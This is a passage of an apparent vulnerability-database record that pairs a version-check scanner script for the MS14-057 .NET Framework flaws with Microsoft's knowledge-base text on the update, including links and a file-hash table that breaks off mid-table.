exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2003:3, win2003x64:3, winVista:3, win7:2, win7x64:2,\n win2008:3, win2008r2:2, win8:1, win8x64:1, win8_1:1, win8_1x64:1,\n win2012:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n path = registry_get_sz(key:key + item, item:\"Path\");\n if(path && \"\\Microsoft.NET\\Framework\" >< path)\n {\n dllVer = fetch_file_version(sysPath:path, file_name:\"System.dll\");\n if(dllVer)\n {\n ## .NET Framework 2.0 Service Pack 2 for Windows Server 2003 Service Pack 2\n if((hotfix_check_sp(win2003:3, win2003x64:3) > 0) &&\n (version_in_range(version:dllVer, test_version:\"2.0.50727.3000\", test_version2:\"2.0.50727.3661\")||\n version_in_range(version:dllVer, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8636\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2\n if((hotfix_check_sp(winVista:3, win2008:3) > 0) &&\n (version_in_range(version:dllVer, test_version:\"2.0.50727.4000\", test_version2:\"2.0.50727.4252\")||\n version_in_range(version:dllVer, test_version:\"2.0.50727.7000\", test_version2:\"2.0.50727.7070\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5 for Windows 8 and Windows Server 2012\n if((hotfix_check_sp(win8:1, win8x64:1, win2012:1) > 0) &&\n (version_in_range(version:dllVer, test_version:\"2.0.50727.6000\", test_version2:\"2.0.50727.6420\")||\n version_in_range(version:dllVer, test_version:\"2.0.50727.7000\", test_version2:\"2.0.50727.7070\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ##.NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2:\n if((hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0) &&\n (version_in_range(version:dllVer, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8008\")||\n version_in_range(version:dllVer, test_version:\"2.0.50727.8600\", test_version2:\"2.0.50727.8614\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1\n if((hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer, test_version:\"2.0.50727.5400\", test_version2:\"2.0.50727.5484\")||\n version_in_range(version:dllVer, test_version:\"2.0.50727.7000\", test_version2:\"2.0.50727.7070\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4 on Windows Server 2003, Windows Vista,\n if((hotfix_check_sp(win2003:3, winVista:3, win2008:3, win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer, test_version:\"4.0.30319.1000\", test_version2:\"4.0.30319.1025\")||\n version_in_range(version:dllVer, test_version:\"4.0.30319.2000\", test_version2:\"4.0.30319.2044\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows Vista SP2,\n if((hotfix_check_sp(winVista:3, win2008:3, win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer, test_version:\"4.0.30319.34000\", test_version2:\"4.0.30319.34237\")||\n version_in_range(version:dllVer, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36249\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2\n ## for Windows 8, Windows Server 2012, Windows 8.1 and Windows Server 2012 R2\n if((hotfix_check_sp(win8:1, win8x64:1, win2012:1, win8_1:1, win8_1x64:1, win2012R2:1) > 0) &&\n (version_in_range(version:dllVer, test_version:\"4.0.30319.34000\", test_version2:\"4.0.30319.34238\")||\n version_in_range(version:dllVer, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36250\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n } ## End of System.dll\n\n\n dllVer2 = fetch_file_version(sysPath:path, file_name:\"System.Deployment.dll\");\n if(dllVer2)\n {\n ## .NET Framework 2.0 Service Pack 2 for Windows Server 2003 Service Pack 2\n if((hotfix_check_sp(win2003:3, win2003x64:3) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"2.0.50727.3000\", test_version2:\"2.0.50727.3662\")||\n version_in_range(version:dllVer2, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8640\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2\n if((hotfix_check_sp(winVista:3, win2008:3) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"2.0.50727.4000\", test_version2:\"2.0.50727.4254\")||\n version_in_range(version:dllVer2, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8640\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5 for Windows 8 and Windows Server 2012\n if((hotfix_check_sp(win8:1, win8x64:1, win2012:1) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"2.0.50727.6000\", test_version2:\"2.0.50727.6423\")||\n version_in_range(version:dllVer2, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8640\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ##.NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2:\n if((hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8011\")||\n version_in_range(version:dllVer2, test_version:\"2.0.50727.8600\", test_version2:\"2.0.50727.8640\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1\n if((hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"2.0.50727.5400\", test_version2:\"2.0.50727.5487\")||\n version_in_range(version:dllVer2, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8640\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4 on Windows Server 2003, Windows Vista,\n if((hotfix_check_sp(win2003:3, winVista:3, win2008:3, win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"4.0.30319.1000\", test_version2:\"4.0.30319.1028\")||\n version_in_range(version:dllVer2, test_version:\"4.0.30319.2000\", test_version2:\"4.0.30319.2047\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows Vista SP2,\n if((hotfix_check_sp(winVista:3, win2008:3, win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"4.0.30319.34000\", test_version2:\"4.0.30319.34243\")||\n version_in_range(version:dllVer2, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36255\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2\n ## for Windows 8, Windows Server 2012, Windows 8.1 and Windows Server 2012 R2\n if((hotfix_check_sp(win8:1, win8x64:1, win2012:1, win8_1:1, win8_1x64:1, win2012R2:1) > 0) &&\n (version_in_range(version:dllVer2, test_version:\"4.0.30319.34000\", test_version2:\"4.0.30319.34242\")||\n version_in_range(version:dllVer2, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36254\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n } ## End of System.Deployment.dll\n\n\n dllVer3 = fetch_file_version(sysPath:path, file_name:\"mscorie.dll\");\n if(dllVer3)\n {\n ## .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2\n if((hotfix_check_sp(winVista:3, win2008:3) > 0) &&\n (version_in_range(version:dllVer3, test_version:\"2.0.50727.4000\", test_version2:\"2.0.50727.4251\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5 for Windows 8 and Windows Server 2012\n if((hotfix_check_sp(win8:1, win8x64:1, win2012:1) > 0) &&\n (version_in_range(version:dllVer3, test_version:\"2.0.50727.6000\", test_version2:\"2.0.50727.6418\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ##.NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2:\n if((hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0) &&\n (version_in_range(version:dllVer3, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8007\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n\n ## .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1\n if((hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0) &&\n (version_in_range(version:dllVer3, test_version:\"2.0.50727.5400\", test_version2:\"2.0.50727.5482\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n } ## End of mscorie.dll\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:51:09", "bulletinFamily": "microsoft", "cvelist": ["CVE-2014-4073", "CVE-2014-4122", "CVE-2014-4121"], "description": "<html><body><p>Resolves vulnerabilities that could allow elevation of privilege, remote code execution, or bypass the Address Space Layout Randomization (ASLR) security feature.</p><h2></h2><div class=\"kb-summary-section section\"><br/><a bookmark-id=\"appliestoproducts\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span></span></div><h2>Introduction</h2><div class=\"kb-summary-section section\">This security update resolves the following:<ul class=\"sbody-free_list\"><li>The vulnerabilities that could allow remote code execution if an attacker sends a specially crafted URL request that contains international characters to a Microsoft .NET web application.</li><li>The vulnerabilities that could allow elevation of privilege by improving how Microsoft .NET Framework communicates with the ClickOnce installer process.\u00a0</li><li>A security feature bypass vulnerability that could let an attacker bypass the Address Space Layout Randomization (ASLR) security feature. An attacker could use this ASLR bypass vulnerability together with another vulnerability, such as a remote code execution vulnerability,\u00a0to take advantage of the ASLR bypass to run arbitrary code.</li></ul><br/></div><h2>Summary</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS14-057. Learn more about how to obtain the fixes that are included in this security bulletin:\u00a0<ul class=\"sbody-free_list\"><li>For individual, small business, and organizational users, use the Windows automatic updating feature to install the fixes from Microsoft Update. To do this, see\u00a0<a href=\"http://www.microsoft.com/security/pc-security/updates.aspx\" id=\"kb-link-1\" target=\"_self\">Get security updates automatically</a> on the Microsoft Safety and Security Center website.<br/></li><li>For IT professionals, see <a href=\"http://technet.microsoft.com/security/bulletin/ms14-057\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS14-057</a> on the Security TechCenter website.</li></ul></div><h2></h2><div class=\"kb-summary-section section\"><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-3\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-4\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware: <a href=\"https://support.microsoft.com/gp/cu_sc_virsec_master\" id=\"kb-link-5\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-6\" target=\"_self\">International Support</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h4 class=\"sbody-h4\">More information about this update</h4>The following articles contain additional information about this update as it relates to individual product versions. The articles may contain specific information to the individual updates such as a download URL, prerequisites, and command-line switches.\u00a0<h5 class=\"sbody-h5 text-subtitle\">Microsoft .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2</h5><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2979578\" id=\"kb-link-7\">2979578 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows Server 2008 R2 SP1: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972107\" id=\"kb-link-8\">2972107 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows Server 2008 R2 SP1: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2979577\" id=\"kb-link-9\">2979577 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows 8, Windows RT, and Windows Server 2012: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2978042\" id=\"kb-link-10\">2978042 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5, the .NET Framework 4.5.1, and the .NET Framework 4.5.2 for Windows 8, Windows RT, and Windows Server 2012: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2979576\" id=\"kb-link-11\">2979576 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5.1 and the .NET Framework 4.5.2 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: October 14,\u00a0</li><li><a href=\"https://support.microsoft.com/en-us/help/2978041\" id=\"kb-link-12\">2978041 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4.5.1 and the .NET Framework 4.5.2 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: October 14, 2014</li></ul><h5 class=\"sbody-h5 text-subtitle\">Microsoft .NET Framework 4</h5><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2979575\" id=\"kb-link-13\">2979575 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4 for Windows Server 2003 SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows Server 2008 R2 SP1: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972106\" id=\"kb-link-14\">2972106 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 4 for Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, and Windows Server 2008 R2 SP1: October 14, 2014</li></ul><h5 class=\"sbody-h5 text-subtitle\">Microsoft .NET Framework 3.5.1</h5><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2979570\" id=\"kb-link-15\">2979570 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972100\" id=\"kb-link-16\">2972100 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2968294\" id=\"kb-link-17\">2968294 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1: October 14, 2014</li></ul><h5 class=\"sbody-h5 text-subtitle\">Microsoft .NET Framework 3.5</h5><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2979573\" id=\"kb-link-18\">2979573 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972103\" id=\"kb-link-19\">2972103 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2968296\" id=\"kb-link-20\">2968296 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2979571\" id=\"kb-link-21\">2979571 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8 and Windows Server 2012: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972101\" id=\"kb-link-22\">2972101 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8 and Windows Server 2012: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2968295\" id=\"kb-link-23\">2968295 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 3.5 for Windows 8 and Windows Server 2012: October 14, 2014</li></ul><h5 class=\"sbody-h5 text-subtitle\">Microsoft .NET Framework 2.0</h5><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2979568\" id=\"kb-link-24\">2979568 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972098\" id=\"kb-link-25\">2972098 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2979574\" id=\"kb-link-26\">2979574 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 2.0 Service Pack 2 for Windows Server 2003 Service Pack 2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2972105\" id=\"kb-link-27\">2972105 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 2.0 Service Pack 2 for Windows Server 2003 Service Pack 2: October 14, 2014</li><li><a href=\"https://support.microsoft.com/en-us/help/2968292\" id=\"kb-link-28\">2968292 </a>\u00a0MS14-057: Description of the security update for the .NET Framework 2.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 14, 2014</li></ul></div><h2></h2><div class=\"kb-moreinformation-section section\"><h4 class=\"sbody-h4\">Update replacement information</h4>Update replacement information for each specific update can be found in the Knowledge Base articles that correspond to this update.</div><h2></h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">File hash information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">MSIPatchRegFix-AMD64.exe</td><td class=\"sbody-td\">5011CB29B096FB674A4795EE8FC2F7FDAD33863A</td><td class=\"sbody-td\">BA62C33DD90ECC3C945AE4F52EEEB2FA07D2C53FB975263B483D09D80F02230D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">MSIPatchRegFix-IA64.exe</td><td class=\"sbody-td\">CB861EAF1F4CDFFAD5F83604C7250CD9EDD96433</td><td class=\"sbody-td\">61867793FC7556B79E5833CC18F493A5611EDE94E0D944575E89BAA76B223A0D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">MSIPatchRegFix-X86.exe</td><td class=\"sbody-td\">94A84B80B8B45A1AC53A0E5D085513DA0F099655</td><td class=\"sbody-td\">C83C5EE1D4FBFF5260A7D984471EAF4C6004431C21B4F661018BDB92CC124290</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2972105-IA64.exe</td><td class=\"sbody-td\">181FFB6B8C6EAD42B9BE36232FD3FA8FFCC7DC11</td><td class=\"sbody-td\">D2EBA1536AE701CE315C70591D0310FFC05272C3CFAC269A574EA4688BE52059</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2972105-x64.exe</td><td class=\"sbody-td\">EA41D17C2AA2115FBE4A86122C2B04B0DF939018</td><td class=\"sbody-td\">A82AA5DFE1296282537A05043F9C4B965C4FA230EFEBE17ADFC229E0644AF2C5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2972105-x86.exe</td><td class=\"sbody-td\">9896D03074FE86CD49481DFC643FBA4D2060171C</td><td class=\"sbody-td\">E5B3B2CB9ADE9129545EB6875A18ACE5E8F6EF811FF610F804CBC6562F63FAEA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2979574-v2-IA64.exe</td><td class=\"sbody-td\">435C2F1A3867DC48572A92154E8784BD2C614C79</td><td class=\"sbody-td\">75ED560D6B5344BC8B1A1E8B2C5F8009D461A58B5A5A0C850B9CAEE257F71FEF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2979574-v2-x64.exe</td><td class=\"sbody-td\">6A79FF5E419B3FD11449945EF2D24389E0B4ADF8</td><td class=\"sbody-td\">FAB19F92DCDC38F4EF83DD2D263147A3F35BF75B007F83D216F694F7BBE6C3BD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP20SP2-KB2979574-v2-x86.exe</td><td class=\"sbody-td\">E9D7E292CFF96F768A99C2F2DBEBA9CA14784C70</td><td class=\"sbody-td\">D0E4B7A685E481D879D948F8C55783AD266ED4641C2355F3D515255C13C96FA6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2972106-IA64.exe</td><td class=\"sbody-td\">7AB764B14D3F4B5E0093C970A761E59296C5F8A2</td><td class=\"sbody-td\">AFA5998D13A93A2807D18C283565D5C7A352CC1DE63FC069E8331E5DD21E0F9D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2972106-x64.exe</td><td class=\"sbody-td\">4631DA8D6454B5680C0159B5254C15D54A8184E1</td><td class=\"sbody-td\">BD44D2CB053510E0CB0BC3BAAE97E34D06D241E4BFC6E03C974A4177E6E0C480</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2972106-x86.exe</td><td class=\"sbody-td\">D4DC74D00B867FE7E2913292341BF86633CB601B</td><td class=\"sbody-td\">100938ADC6DBCD34775AFA58BCDA0B93D83F6270E3F00D0A6CBEDC779533759D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2979575-v2-IA64.exe</td><td class=\"sbody-td\">6FE17DD1B17066C83838B9C37816F50E923771D4</td><td class=\"sbody-td\">D016385E98986E973645D583102AA540B2ADB33DD0C5C50D5950D1BCDF58CFEA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2979575-v2-x64.exe</td><td class=\"sbody-td\">DB55951BF20173742751FEDA19432BC2F96DC3EE</td><td class=\"sbody-td\">3D42B4902F95686C38748E9F17C587E3109C44BECF00DF36A7DE7199C9E28B2E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP40-KB2979575-v2-x86.exe</td><td class=\"sbody-td\">777DFD33ABB9A9DCFC3192CA910C58061C32D5B1</td><td class=\"sbody-td\">FEA33AE2A36485EB3E54A92375EA6BD357A808C0A5C165CD5914DD9BC7461843</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP45-KB2972107-x64.exe</td><td class=\"sbody-td\">338BD55ED27B6897C6BCAA2A6EF9C57E77B95910</td><td class=\"sbody-td\">2327E0239CD26F22D71A697F9657333BB5B3503401C2B512308F6760AC670E01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP45-KB2972107-x86.exe</td><td class=\"sbody-td\">1FF2E8E02ED7FF97457A85EADDEA125BEAED428C</td><td class=\"sbody-td\">E47EA29BE134E5A27F621A717C16F97628215F6963F49DE8954EC3B247CB6450</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP45-KB2979578-v2-x64.exe</td><td class=\"sbody-td\">8572841FC55CCF101C01F87EBFA4EC7BE0911EBF</td><td class=\"sbody-td\">539A78EBBDE633C12FBE59FFC6361B9A251FEAAB7A3A82864C963DA7DF7E5E49</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP45-KB2979578-v2-x86.exe</td><td class=\"sbody-td\">ABD805B4503234EDF7A3D0EE32EE5BA1A72C6AC1</td><td class=\"sbody-td\">35CAAA796806D3631E11B62D742063CA7B1A41E9D4B73FDD9A0A802295DF8906</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2968292-ia64.msu</td><td class=\"sbody-td\">A9CFAD95B0D8BBE2C01541E09A916788A53087EB</td><td class=\"sbody-td\">68979E3BDBCB6C085FA2BB9B094C2B69ADE0CF152777E72C32DDF0AB22F4B3A7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2968292-x64.msu</td><td class=\"sbody-td\">CAA91DA06AC6928409E34821F9B46568068C0EF1</td><td class=\"sbody-td\">BC2354B15D9336F3CA6C82F813962DA96F22A1DCC5054668A7367625B3B5D1F8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2968292-x86.msu</td><td class=\"sbody-td\">B5352367B47FE33D868C40D58FE8C78BFA278B04</td><td class=\"sbody-td\">97A731C2776D7E21BEFF723486059020968A57085328FF133E2F77185763697E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2972098-ia64.msu</td><td class=\"sbody-td\">A837A86DBA74E550E62D59451AF4BED6BE5885DB</td><td class=\"sbody-td\">189A1A9A534911BCCF4D3C3C24EEDEFC8360D1C368AF7D49EC52AB914DB7F56C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2972098-x64.msu</td><td class=\"sbody-td\">4E4A09AA4EC90794698A04DEE27292CBB8F317D3</td><td class=\"sbody-td\">EFA450FB91DEE1856EC120ED251C633503C1C04AEDC21C4E700B085889269602</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2972098-x86.msu</td><td class=\"sbody-td\">CB46202234110F149232A535BDBAC67F0A7891C7</td><td class=\"sbody-td\">367E7D40208487ED8220F495B925DBE554075DC88FF809572020F1798E2226DB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2979568-ia64.msu</td><td class=\"sbody-td\">3D7409E38738911D59C72E65E21CFAFF24ED9630</td><td class=\"sbody-td\">BDEF311ED4E9613F3F4A68F59031321F4A5F50C556DC6FA1D808D7FDF6065D94</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2979568-x64.msu</td><td class=\"sbody-td\">F0C3DF10507C0EEBADC5F5CB722C093A3A46C5E7</td><td class=\"sbody-td\">B974C1585BB07D0756197631D4DCA372180AE1B17FD36F717ADDD1486BB2A43D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2979568-x86.msu</td><td class=\"sbody-td\">984EEDD830AAE372AC0578973BEEF80BC5EA08F2</td><td class=\"sbody-td\">A606F49318A2171A729AC14663E4C12262E47F0FD7361D74E6C0AB1D9DE728E0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2968294-ia64.msu</td><td class=\"sbody-td\">43BC4F31CFC8C133D625BB83567B8BE0064030DA</td><td class=\"sbody-td\">ACA6B01C2ED8AC2AB72E7E24949B186C2C9DA7C29BC36EF8BB49F1290FB7FA8B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2968294-x64.msu</td><td class=\"sbody-td\">CFF0BAFAC3C677448C233DC0B596C8A14B9FF58C</td><td class=\"sbody-td\">42F7C07A483A7940F8C0FF61F8F16D0839E567B9848BA67EAED2A20064FC11AD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2968294-x86.msu</td><td class=\"sbody-td\">5D007341C62969877271E7AA20607281BC8C338B</td><td class=\"sbody-td\">764766E0732A29B718B5F49949C91506494A8D2EDBEF995770C089E6825277EA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2972100-ia64.msu</td><td class=\"sbody-td\">5E463F7DF88201A29F470063A0512DF2B92A9755</td><td 